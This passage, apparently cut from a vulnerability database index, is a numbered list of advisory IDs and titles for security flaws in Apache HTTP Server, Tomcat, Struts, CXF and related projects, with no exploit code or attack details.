9826| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
9827| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
9828| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
9829| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
9830| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
9831| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
9832| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
9833| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
9834| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
9835| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
9836| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
9837| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
9838| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
9839| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
9840| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
9841| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
9842| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
9843| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
9844| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
9845| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
9846| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
9847| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
9848| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
9849| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
9850| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
9851| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
9852| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
9853| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
9854| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
9855| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
9856| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
9857| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
9858| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
9859| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
9860| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
9861| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
9862| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
9863| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
9864| [54798] Apache Libcloud Man In The Middle Vulnerability
9865| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
9866| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
9867| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
9868| [54189] Apache Roller Cross Site Request Forgery Vulnerability
9869| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
9870| [53880] Apache CXF Child Policies Security Bypass Vulnerability
9871| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
9872| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
9873| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
9874| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
9875| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
9876| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
9877| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
9878| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
9879| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
9880| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
9881| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
9882| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
9883| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
9884| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
9885| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
9886| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
9887| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
9888| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
9889| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
9890| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
9891| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
9892| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
9893| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
9894| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
9895| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
9896| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
9897| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
9898| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
9899| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
9900| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
9901| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
9902| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
9903| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
9904| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
9905| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
9906| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
9907| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
9908| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
9909| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
9910| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
9911| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
9912| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
9913| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
9914| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
9915| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
9916| [49290] Apache Wicket Cross Site Scripting Vulnerability
9917| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
9918| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
9919| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
9920| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
9921| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
9922| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
9923| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
9924| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
9925| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
9926| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
9927| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
9928| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
9929| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
9930| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
9931| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
9932| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
9933| [46953] Apache MPM-ITK Module Security Weakness
9934| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
9935| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
9936| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
9937| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
9938| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
9939| [46166] Apache Tomcat JVM Denial of Service Vulnerability
9940| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
9941| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
9942| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
9943| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
9944| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
9945| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
9946| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
9947| [44616] Apache Shiro Directory Traversal Vulnerability
9948| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
9949| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
9950| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
9951| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
9952| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
9953| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
9954| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
9955| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
9956| [42492] Apache CXF XML DTD Processing Security Vulnerability
9957| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
9958| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9959| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
9960| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
9961| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
9962| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
9963| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
9964| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
9965| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
9966| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
9967| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
9968| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
9969| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
9970| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
9971| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
9972| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
9973| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
9974| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
9975| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
9976| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
9977| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
9978| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
9979| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
9980| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
9981| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
9982| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
9983| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
9984| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
9985| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
9986| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
9987| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
9988| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
9989| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
9990| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
9991| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
9992| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
9993| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
9994| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
9995| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
9996| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
9997| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
9998| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
9999| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
10000| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
10001| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
10002| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
10003| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
10004| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
10005| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
10006| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
10007| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
10008| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
10009| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
10010| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
10011| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
10012| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
10013| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
10014| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
10015| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
10016| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
10017| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
10018| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
10019| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
10020| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
10021| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
10022| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
10023| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
10024| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
10025| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
10026| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
10027| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
10028| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
10029| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
10030| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
10031| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
10032| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
10033| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
10034| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
10035| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
10036| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
10037| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
10038| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
10039| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
10040| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
10041| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
10042| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
10043| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
10044| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
10045| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
10046| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
10047| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
10048| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
10049| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
10050| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
10051| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
10052| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
10053| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
10054| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
10055| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
10056| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
10057| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
10058| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
10059| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
10060| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
10061| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
10062| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
10063| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
10064| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
10065| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
10066| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
10067| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
10068| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
10069| [20527] Apache Mod_TCL Remote Format String Vulnerability
10070| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
10071| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
10072| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
10073| [19106] Apache Tomcat Information Disclosure Vulnerability
10074| [18138] Apache James SMTP Denial Of Service Vulnerability
10075| [17342] Apache Struts Multiple Remote Vulnerabilities
10076| [17095] Apache Log4Net Denial Of Service Vulnerability
10077| [16916] Apache mod_python FileSession Code Execution Vulnerability
10078| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
10079| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
10080| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
10081| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
10082| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
10083| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
10084| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
10085| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
10086| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
10087| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
10088| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
10089| [15177] PHP Apache 2 Local Denial of Service Vulnerability
10090| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
10091| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
10092| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
10093| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
10094| [14106] Apache HTTP Request Smuggling Vulnerability
10095| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
10096| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
10097| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
10098| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
10099| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
10100| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
10101| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
10102| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
10103| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
10104| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
10105| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
10106| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
10107| [11471] Apache mod_include Local Buffer Overflow Vulnerability
10108| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
10109| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
10110| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
10111| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
10112| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
10113| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
10114| [11094] Apache mod_ssl Denial Of Service Vulnerability
10115| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
10116| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
10117| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
10118| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
10119| [10478] ClueCentral Apache Suexec Patch Security Weakness
10120| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
10121| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
10122| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
10123| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
10124| [9921] Apache Connection Blocking Denial Of Service Vulnerability
10125| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
10126| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
10127| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
10128| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
10129| [9733] Apache Cygwin Directory Traversal Vulnerability
10130| [9599] Apache mod_php Global Variables Information Disclosure Weakness
10131| [9590] Apache-SSL Client Certificate Forging Vulnerability
10132| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
10133| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
10134| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
10135| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
10136| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
10137| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
10138| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
10139| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
10140| [8898] Red Hat Apache Directory Index Default Configuration Error
10141| [8883] Apache Cocoon Directory Traversal Vulnerability
10142| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
10143| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
10144| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
10145| [8707] Apache htpasswd Password Entropy Weakness
10146| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
10147| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
10148| [8226] Apache HTTP Server Multiple Vulnerabilities
10149| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
10150| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
10151| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
10152| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
10153| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
10154| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
10155| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
10156| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
10157| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
10158| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
10159| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
10160| [7255] Apache Web Server File Descriptor Leakage Vulnerability
10161| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
10162| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
10163| [6939] Apache Web Server ETag Header Information Disclosure Weakness
10164| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
10165| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
10166| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
10167| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
10168| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
10169| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
10170| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
10171| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
10172| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
10173| [6117] Apache mod_php File Descriptor Leakage Vulnerability
10174| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
10175| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
10176| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
10177| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
10178| [5992] Apache HTDigest Insecure Temporary File Vulnerability
10179| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
10180| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
10181| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
10182| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
10183| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
10184| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
10185| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
10186| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
10187| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
10188| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
10189| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
10190| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
10191| [5485] Apache 2.0 Path Disclosure Vulnerability
10192| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
10193| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
10194| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
10195| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
10196| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
10197| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
10198| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
10199| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
10200| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
10201| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
10202| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
10203| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
10204| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
10205| [4437] Apache Error Message Cross-Site Scripting Vulnerability
10206| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
10207| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
10208| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
10209| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
10210| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
10211| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
10212| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
10213| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
10214| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
